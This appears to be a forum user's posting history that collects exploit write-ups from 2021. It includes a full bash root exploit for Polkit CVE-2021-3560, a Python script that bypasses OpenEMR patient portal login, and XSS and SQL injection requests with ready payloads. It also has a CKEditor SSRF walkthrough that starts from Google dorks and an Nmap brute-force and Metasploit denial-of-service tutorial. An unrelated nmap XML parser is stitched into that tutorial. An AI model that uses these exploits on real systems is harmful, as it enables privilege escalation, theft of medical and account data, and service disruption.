
HireHackking


Everything posted by HireHackking

1. # Exploit Title: Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 14-06-2021
# Vendor Homepage: https://bitbucket.org/phjounin/tftpd64/src/master/
# Software Links: https://bitbucket.org/phjounin/tftpd64/wiki/Download%20Tftpd64.md
# Tested Version: 4.64
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Tftpd32 service edition    Tftpd32_svc    C:\Program Files\Tftpd64_SE\tftpd64_svc.exe    Auto

C:\Users\IEUser>sc qc Tftpd32_svc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Tftpd32_svc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Tftpd64_SE\tftpd64_svc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Tftpd32 service edition
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
2. # Exploit Title: SysGauge 7.9.18 - 'SysGauge Server' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 14-06-2021
# Vendor Homepage: https://www.sysgauge.com
# Software Link: https://www.sysgauge.com/setups/sysgaugesrv_setup_v7.9.18.exe
# Tested Version: 7.9.18
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

C:\>sc qc "SysGauge Server"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SysGauge Server
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\SysGauge Server\bin\sysgaus.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SysGauge Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
3. # Exploit Title: Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path
# Discovery by: BRushiran
# Date: 15-06-2021
# Vendor Homepage: https://www.disksorter.com
# Software Links: https://www.disksorter.com/setups_x64/disksorterent_setup_v13.6.12_x64.exe
# Tested Version: 13.6.12
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Disk Sorter Enterprise    Disk Sorter Enterprise    C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe    Auto

C:\>sc qc "Disk Sorter Enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Disk Sorter Enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Disk Sorter Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
4. # Exploit Title: Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path
# Discovery by: BRushiran
# Date: 15-06-2021
# Vendor Homepage: https://www.disksorter.com
# Software Links: https://www.disksorter.com/setups_x64/disksortersrv_setup_v13.6.12_x64.exe
# Tested Version: 13.6.12
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Disk Sorter Server    Disk Sorter Server    C:\Program Files\Disk Sorter Server\bin\disksrs.exe    Auto

C:\>sc qc "Disk Sorter Server"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Disk Sorter Server
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Disk Sorter Server\bin\disksrs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Disk Sorter Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
5. # Exploit Title: DiskPulse 13.6.14 - 'Multiple' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 14-06-2021
# Vendor Homepage: https://www.diskpulse.com
# Software Links:
# https://www.diskpulse.com/setups_x64/diskpulseent_setup_v13.6.14_x64.exe
# https://www.diskpulse.com/setups_x64/diskpulsesrv_setup_v13.6.14_x64.exe
# Tested Version: 13.6.14
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Disk Pulse Enterprise    Disk Pulse Enterprise    C:\Program Files\Disk Pulse Enterprise\bin\diskpls.exe    Auto
Disk Pulse Server        Disk Pulse Server        C:\Program Files\Disk Pulse Server\bin\diskpls.exe        Auto

C:\Users\IEUser>sc qc "Disk Pulse Enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Disk Pulse Enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Disk Pulse Enterprise\bin\diskpls.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Disk Pulse Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\IEUser>sc qc "Disk Pulse Server"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Disk Pulse Server
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Disk Pulse Server\bin\diskpls.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Disk Pulse Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
6. # Exploit Title: Polkit 0.105-26 0.117-2 - Local Privilege Escalation
# Date: 06/11/2021
# Exploit Author: J Smith (CadmusofThebes)
# Vendor Homepage: https://www.freedesktop.org/
# Software Link: https://www.freedesktop.org/software/polkit/docs/latest/polkitd.8.html
# Version: polkit 0.105-26 (Ubuntu), polkit 0.117-2 (Fedora)
# Tested on: Ubuntu 20.04, Fedora 33
# CVE: CVE-2021-3560
# Source: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/

#!/bin/bash

# Set the name and display name
userName="hacked"
realName="hacked"

# Set the account as an administrator
accountType=1

# Set the password hash for 'password' and password hint
password='$5$WR3c6uwMGQZ/JEZw$OlBVzagNJswkWrKRSuoh/VCrZv183QpZL7sAeskcoTB'
passHint="password"

# Check Polkit version
# (both package counts are compared with -ge 1; a bare "$(... | grep -c ...)" string
# is non-empty even when it is "0" and would always test true)
polkitVersion=$(systemctl status polkit.service | grep version | cut -d " " -f 9)
if [[ "$(apt list --installed 2>/dev/null | grep polkit | grep -c 0.105-26)" -ge 1 || "$(yum list installed 2>/dev/null | grep polkit | grep -c 0.117-2)" -ge 1 ]]; then
    echo "[*] Vulnerable version of polkit found"
else
    echo "[!] WARNING: Version of polkit might not be vulnerable"
fi

# Validate user is running in SSH instead of desktop terminal
if [[ -z $SSH_CLIENT || -z $SSH_TTY ]]; then
    echo "[!] WARNING: SSH into localhost first before running this script in order to avoid authentication prompts"
    exit
fi

# Test the dbus-send timing to load into exploit
echo "[*] Determining dbus-send timing"
realTime=$( TIMEFORMAT="%R"; { time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType ; } 2>&1 | cut -d " " -f6 )
halfTime=$(echo "scale=3;$realTime/2" | bc)

# Check for user first in case previous run of script failed on password set
if id "$userName" &>/dev/null; then
    userid=$(id -u $userName)
    echo "[*] New user $userName already exists with uid of $userid"
else
    userid=""
    echo "[*] Attempting to create account"
    while [[ $userid == "" ]]
    do
        # Kill dbus-send halfway through the call so polkit sees a vanished caller
        dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null
        if id "$userName" &>/dev/null; then
            userid=$(id -u $userName)
            echo "[*] New user $userName created with uid of $userid"
        fi
    done
fi

# Add the password to /etc/shadow
# Sleep added to ensure there is enough of a delay between timestamp checks
echo "[*] Adding password to /etc/shadow and enabling user"
sleep 1
currentTimestamp=$(stat -c %Z /etc/shadow)
fileChanged="n"
while [ $fileChanged == "n" ]
do
    dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$userid org.freedesktop.Accounts.User.SetPassword string:$password string:$passHint 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null
    if [ $(stat -c %Z /etc/shadow) -ne $currentTimestamp ]; then
        fileChanged="y"
        echo "[*] Exploit complete!"
    fi
done

echo ""
echo "[*] Run 'su - $userName', followed by 'sudo su' to gain root access"
7. # Exploit Title: Brother BRAgent 1.38 - 'WBA_Agent_Client' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 14-06-2021
# Vendor Homepage: https://brother.com
# Software Link: https://support.brother.com/g/b/downloadhowto.aspx?c=us&lang=en&prod=ads1000w_us&os=10013&dlid=dlf002778_000&flang=4&type3=46
# Tested Version: 1.38
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Brother BRAgent    WBA_Agent_Client    C:\Program Files (x86)\Brother\BRAgent\BRAgtSrv.exe    Auto

C:\>sc qc WBA_Agent_Client
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WBA_Agent_Client
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Brother\BRAgent\BRAgtSrv.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Brother BRAgent
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
8. # Exploit Title: Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting
# Date: 2021-06-15
# Exploit Author: Fatih İLGİN
# Vendor Homepage: cotonti.com
# Vulnerable Software: https://www.cotonti.com/download/siena_0919
# Affected Version: 0.9.19
# Tested on: Windows 10
# Vulnerable Parameter Type: POST
# Vulnerable Parameter: maintitle
# Attack Pattern: "><img src=1 href=1 onerror="javascript:alert(1)"></img>

# Description
1) Enter the Admin Panel (vulnerableapplication.com/cotonti/admin.php)
2) Go to the Configuration tab and set the payload ("><img src=1 href=1 onerror="javascript:alert(1)"></img>) for the Site title param
3) Click the Update button
4) Finally, go to the home page; the triggered vulnerability is shown

# Proof of Concept

Request:

POST /cotonti/admin.php?m=config&n=edit&o=core&p=title&a=update HTTP/1.1
Host: vulnerableapplication.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 440
Origin: https://vulnerableapplication.com
Connection: close
Referer: https://vulnerableapplication/cotonti/admin.php?m=config&n=edit&o=core&p=title
Cookie: __cmpconsentx19318=CPH17mBPH17mBAfUmBENBeCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA; __cmpcccx19318=aBPH17mCgAADAAXAA0AB4AQ4DiQKnAAA; _ga=GA1.2.1498194981.1623770561; _gid=GA1.2.1196246770.1623770561; __gads=ID=63f33aa9dd32c83c-220723d35ec800e9:T=1623770613:RT=1623770613:S=ALNI_MZ0ifDGVpIXuopc8JXvo208SRTYmA; PHPSESSID=ahmanvhckp2o5g5rnpr4cnj9c3

x=701dad27076b1d78&maintitle=%22%3E%3Cimg+src%3D1+href%3D1+onerror%3D%22javascript%3Aalert(1)%22%3E%3C%2Fimg%3E&subtitle=Subtitle&metakeywords=&title_users_details=%7BUSER%7D%3A+%7BNAME%7D&title_header=%7BSUBTITLE%7D+-+%7BMAINTITLE%7D&title_header_index=%7BMAINTITLE%7D+-+%7BDESCRIPTION%7D&subject_mail=%7BSITE_TITLE%7D+-+%7BMAIL_SUBJECT%7D&body_mail=%7BMAIL_BODY%7D%0D%0A%0D%0A%7BSITE_TITLE%7D+-+%7BSITE_URL%7D%0D%0A%7BSITE_DESCRIPTION%7D

Response:

HTTP/1.1 200 OK
Date: Tue, 15 Jun 2021 16:07:59 GMT
Server: Apache
Expires: Mon, Apr 01 1974 00:00:00 GMT
Cache-Control: no-store,no-cache,must-revalidate, post-check=0,pre-check=0
Pragma: no-cache
Last-Modified: Tue, 15 Jun 2021 04:07:59 GMT
Vary: Accept-Encoding
X-Robots-Tag: noindex,nofollow
Content-Length: 4366
Connection: close
Content-Type: text/html; charset=UTF-8

<h1 class="body"><a href="admin.php" title="Administration panel">Administration panel</a> / <a href="admin.php?m=config" title="Configuration">Configuration</a> / <a href="admin.php?m=config&n=edit&o=core&p=title" title="Titles and Metas">Titles and Metas</a></h1>
<div id="main" class="body clear">
<h2>Configuration</h2>
<div class="done">
<h4>Done</h4>
<ul>
<li>Updated</li>
</ul>
</div>
9. # Exploit Title: CKEditor 3 - Server-Side Request Forgery (SSRF)
# Google Dorks: inurl /editor/filemanager/connectors/uploadtest.html
# Date: 12-6-2021
# Exploit Author: Blackangel
# Software Link: https://ckeditor.com/
# Version: all versions under 4 (1, 2, 3)
# Tested on: Windows 7

Steps of Exploit:
1- Use the Google dork inurl /editor/filemanager/connectors/uploadtest.html
2- After going to the vulnerable page you will find the field "Custom Uploader URL:"
3- Right click, choose Inspect Element, click on "pick an element from the page", and select the field "Custom Uploader URL:"
4- In the elements, "<input id="txtCustomUrl" style="WIDTH: 100%; BACKGROUND-COLOR: #dcdcdc" disabled="" type="text">", delete disabled=""
5- Now you can put a URL starting with any protocol
6- Send it to the server; as you see, the website whose link you entered appears in the page.

What does this mean? You send a request to the server using the vulnerable website; you can say I used it as a proxy:

hackers >>> vulnerable website >>> http://xx.com

So in the http://xx.com logs, the requests come from the vulnerable website.

Impact:
1- This allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. If a big company uses the old version, hackers can send requests via their websites, and this is not good for the reputation of the company.
2- It can put a big company's website on a blacklist of websites, because hackers can send many requests via the vulnerable website.

Mitigation:
Remove the uploadtest.html file as it is not used by the application.
10. # Exploit Title: Teachers Record Management System 1.0 - 'email' Stored Cross-site Scripting (XSS)
# Date: 05-10-2021
# Exploit Author: nhattruong
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10 + XAMPP v3.2.4

POC:
1. Go to url http://localhost/admin/index.php
2. Do login
3. Execute the payload
4. Reload the page to see the difference

Payload:

POST /admin/adminprofile.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Origin: http://localhost
Connection: close
Referer: http://localhost/trms/admin/adminprofile.php
Cookie: PHPSESSID=8vkht2tvbo774tsjke1t739i7l
Upgrade-Insecure-Requests: 1

adminname=Adminm&username=admin&mobilenumber=8979555556&email="><script>alert(123);</script>&submit=
11. # Exploit Title: Teachers Record Management System 1.0 - Multiple SQL Injection (Authenticated)
# Date: 05-10-2021
# Exploit Author: nhattruong
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10 + XAMPP v3.2.4

POC:
1. Go to url http://localhost/login.php
2. Login with default creds
3. Execute the payload

Payload #1:

POST /admin/search.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Origin: http://localhost
Connection: close
Referer: http://localhost/trms/admin/search.php
Cookie: PHPSESSID=4c4g8dedr7omt9kp1j7d6v6fg0
Upgrade-Insecure-Requests: 1

searchdata=a' or 1=1-- -&search=

Payload #2:
http://local/admin/edit-subjects-detail.php?editid=a' or 1=1-- -

Payload #3:
http://local/admin/edit-teacher-detail.php?editid=a' or 1=1-- -
12. # Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass
# Date 15.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip
# Version: All versions prior to 5.0.1.4
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-15152
# CWE: CWE-287
# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit

'''
Description:
An unauthenticated user is able to bypass the Patient Portal Login by simply navigating to the registration page and modifying the requested url to access the desired page.
Some examples of pages in the portal directory that are accessible after browsing to the registration page include:
- add_edit_event_user.php
- find_appt_popup_user.php
- get_allergies.php
- get_amendments.php
- get_lab_results.php
- get_medications.php
- get_patient_documents.php
- get_problems.php
- get_profile.php
- portal_payment.php
- messaging/messages.php
- messaging/secure_chat.php
- report/pat_ledger.php
- report/portal_custom_report.php
- report/portal_patient_report.php
Normally, access to these pages requires authentication as a patient. If a user were to visit any of those pages unauthenticated, they would be redirected to the login page.
'''

'''
Import required modules:
'''
import requests
import argparse

'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--Openemrpath', type=str)
my_parser.add_argument('-R', '--PathToGet', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
openemr_path = args.Openemrpath
pathtoread = args.PathToGet

'''
Check for vulnerability:
'''
# Check if the Registration portal is enabled. If it is not, this exploit can not work
session = requests.Session()
check_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php'
check_vuln = session.get(check_vuln_url).text
print('')
print('[*] Checking vulnerability: ')
print('')
if "Enter email address to receive registration." in check_vuln:
    print('[+] Host Vulnerable. Proceeding exploit')
else:
    print('[-] Host is not Vulnerable: Registration for patients is not enabled')
    raise SystemExit(1)  # without the registration page there is nothing to bypass

'''
Exploit:
'''
# Visiting the registration page first (same session) is what unlocks the other portal pages
header = {
    'Referer': check_vuln_url
}
exploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread
Exploit = session.get(exploit_url, headers=header)
print('')
print('[+] Results: ')
print('')
print(Exploit.text)
print('')
13. I have written about Nmap tutorials many times in previous articles. Usually we scan the ports directly with Nmap and then use msf or nessus to scan for and exploit vulnerabilities, so the whole process is quite cumbersome. That is why we need to understand Nmap's extension scripts: nmap --script

Nmap's script location: /usr/share/nmap/scripts/

Check the number of scripts:

ls /usr/share/nmap/scripts/ | wc -l

It can be seen that there are currently 605 plug-ins. Of course, we can write these plug-ins ourselves or download them. All in all, very convenient.

Nmap scripts are mainly divided into the following categories. When scanning, you can set them as needed with --script=category. This method is used to perform a more general scan:

- auth: handles authentication credentials (authentication bypass, weak passwords)
- broadcast: probes the LAN by broadcast to detect more active services
- brute: brute-force cracking methods for common applications such as http/snmp
- default: the default scripts; use the -sC or -A option to scan with them
- dos: used for denial of service attacks
- exploit: utilizes known vulnerabilities
- vuln: responsible for checking whether the target machine has common vulnerabilities

Common examples

Check weak passwords:

nmap --script=auth 192.168.123.1

Brute-force cracking can crack common protocols such as mysql, http, smtp:

nmap --script=brute 192.168.123.1

The result is as follows. Through brute-force cracking we got the telnet login password, admin. Try to log in.

Default script scanning

The default script scan mainly collects information from various application services. After collection, attacks can be carried out on specific services.

nmap --script=default 192.168.123.1
or
nmap -sC 192.168.123.1

Check for common vulnerabilities:

nmap --script=vuln 192.168.123.1

From the scan, the target may have the CVE-2007-6750 vulnerability.

Vulnerability exploitation

Search for this vulnerability in msf and configure the relevant information:

search CVE-2007-6750
use auxiliary/dos/http/slowloris
show options
set rhost 192.168.123.1
run

whois analysis

We perform a historical analysis query on the forum address bbskali.cn:

nmap --script external bbskali.cn

As shown, we have obtained a lot of useful information.

HTTP authentication brute force:

nmap --script=http-brute 192.168.123.1

Similarly, we use the router's login password as the cracking target, and the crack yields the account and password admin.

Note: Nmap's default dictionary location is /usr/share/nmap/nselib/data

Website directory scan

Similar to Yujian, nmap can also scan website directories:

nmap --script=http-ls bbskali.cn

mysql-related

# Crack the root password
nmap -p3306 --script=mysql-empty-password.nse 192.168.123.129

# List mysql users
nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.123.129
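The step between "nmap --script=vuln" and "search CVE-2007-6750" in msf is reading the vuln output and pulling out the ids of what was actually reported vulnerable. The following is an added example, not part of the tutorial above and not code from the Nmap project: it parses the XML that nmap writes with -oX and collects the CVE ids from the structured output the vulns NSE library produces (one table per vulnerability id with title, state and ids elements). The XML below is a constructed sample in that shape, reflecting the CVE-2007-6750 result the tutorial mentions; no scan is run. Treating every state other than NOT VULNERABLE / UNKNOWN as a finding is an assumption of this example.

```python
"""Triage nmap --script=vuln XML output: list positive findings and their CVE ids.
Added example for the tutorial above; the XML sample is constructed, not captured."""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample of `nmap --script=vuln -oX scan.xml 192.168.123.1`.
# The http-slowloris-check table follows the vulns library layout; the
# http-csrf script reports nothing and has no table.
SAMPLE_NMAP_XML = b'''<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap --script=vuln -oX scan.xml 192.168.123.1">
  <host>
    <address addr="192.168.123.1" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http"/>
        <script id="http-slowloris-check" output="VULNERABLE">
          <table key="CVE-2007-6750">
            <elem key="title">Slowloris DOS attack</elem>
            <elem key="state">LIKELY VULNERABLE</elem>
            <table key="ids"><elem>CVE:CVE-2007-6750</elem></table>
          </table>
        </script>
        <script id="http-csrf" output="Couldn't find any CSRF vulnerabilities."/>
      </port>
      <port protocol="tcp" portid="23">
        <state state="open"/>
        <service name="telnet"/>
      </port>
    </ports>
  </host>
</nmaprun>'''

# vulns.lua states that mean "nothing to chase"; everything else is a finding.
NEGATIVE_STATE_PREFIXES = ("NOT VULNERABLE", "UNKNOWN")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def vuln_findings(xml_bytes: bytes) -> List[Dict[str, object]]:
    """One record per vulnerability table whose state is not negative."""
    root = ET.fromstring(xml_bytes)
    findings: List[Dict[str, object]] = []
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            service = port.find("service")
            for script in port.findall("script"):
                for table in script.findall("table"):
                    state = table.findtext("elem[@key='state']", default="").strip()
                    if not state or state.upper().startswith(NEGATIVE_STATE_PREFIXES):
                        continue
                    # ids are written as "CVE:CVE-2007-6750", "OSVDB:..." etc.
                    id_texts = [e.text or "" for e in table.findall("table[@key='ids']/elem")]
                    cves = sorted({m for t in id_texts for m in CVE_RE.findall(t)})
                    findings.append({
                        "host": addr,
                        "port": port.get("portid"),
                        "service": service.get("name") if service is not None else "",
                        "script": script.get("id"),
                        "title": table.findtext("elem[@key='title']", default=table.get("key")),
                        "state": state,
                        "cves": cves,
                    })
    return findings


def msf_search_commands(findings: List[Dict[str, object]]) -> List[str]:
    """The msfconsole `search` lines to run next, one per CVE id found."""
    return [f"search {cve}" for f in findings for cve in f["cves"]]


if __name__ == "__main__":
    found = vuln_findings(SAMPLE_NMAP_XML)
    for f in found:
        print(f"{f['host']}:{f['port']}/{f['service']} {f['script']}: {f['title']} [{f['state']}] {f['cves']}")
    for cmd in msf_search_commands(found):
        print(cmd)
```

Run it against a real file with `vuln_findings(open("scan.xml", "rb").read())`. The state filter matters: scripts in the vuln category also emit tables for checks that came back NOT VULNERABLE, so grepping for a CVE id in the raw output over-reports.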
14. # Exploit Title: Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 16-06-2021
# Vendor Homepage: https://www.syncbreeze.com/
# Software Links:
# https://www.syncbreeze.com/setups_x64/syncbreezesrv_setup_v13.6.18_x64.exe
# https://www.syncbreeze.com/setups_x64/syncbreezeent_setup_v13.6.18_x64.exe
# Tested Version: 13.6.18
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Sync Breeze Server        Sync Breeze Server        C:\Program Files\Sync Breeze Server\bin\syncbrs.exe        Auto
Sync Breeze Enterprise    Sync Breeze Enterprise    C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe    Auto

C:\Users\IEUser>sc qc "Sync Breeze Server"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Sync Breeze Server
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Sync Breeze Server\bin\syncbrs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Sync Breeze Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\IEUser>sc qc "Sync Breeze Enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Sync Breeze Enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Sync Breeze Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
15. # Exploit Title: Unified Office Total Connect Now 1.0 - 'data' SQL Injection
# Shodan Filter: http.title:"TCN User Dashboard"
# Date: 06-16-2021
# Exploit Author: Ajaikumar Nadar
# Vendor Homepage: https://unifiedoffice.com/
# Software Link: https://unifiedoffice.com/voip-business-solutions/
# Version: 1.0
# Tested on: CentOS + Apache/2.2.15

POC:
1. Go to url http://localhost/operator/operatorLogin.php and login
2. Capture the request in Burpsuite and use the payload as given below.
3. Observe the response, which reveals the DB version of mysql.

Request:

POST /operator/operatorLogin.php HTTP/1.1
Host: localhost
Connection: close
Content-Length: 178
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://localhost/operator/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=sosbriscgul9onu25sf2731e81

data={"extension":"((select 1 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b))","pin":"bar"}

Response:

HTTP/1.1 400 Bad Request
Date: Wed, 16 Jun 2021 12:49:56 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 139
Connection: close
Content-Type: text/html; charset=UTF-8

Query failed, called from: sqlquery:/var/www/html/recpanel/operator/operatorLogin.php:62: Duplicate entry '::5.1.73::1' for key 'group_key'
